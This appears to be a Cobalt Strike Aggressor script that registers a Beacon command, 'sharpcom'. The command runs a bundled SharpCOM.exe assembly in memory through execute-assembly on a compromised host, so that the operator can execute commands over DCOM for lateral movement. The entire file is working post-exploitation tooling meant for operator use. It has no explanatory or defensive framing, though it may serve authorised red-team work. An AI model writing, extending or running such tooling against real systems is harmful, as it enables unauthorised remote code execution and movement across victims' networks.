beacon_command_register("sharpcom", "Execute's commands via various DCOM methods as demonstrated by (@enigma0x3) C#",
	"Usage: sharpcom [arguments]\n\n" .
	"Uses execute-assembly to run the assembly and takes given arguments\n");
alias sharpcom{
	local('$bid $asm $desc @args $argu');
	$bid = $1;
	$desc = "SharpCOM";
	@args = @_;
	remove(@args, $bid);
	$argu = join(' ', @args);
	if ($argu eq ""){
		blog2($bid, "" . dstamp(ticks()) . " Executing $desc");
	}
	else{
		blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'");
	}
	bexecute_assembly!($bid, script_resource("exe/SharpCOM.exe"), $argu);
}
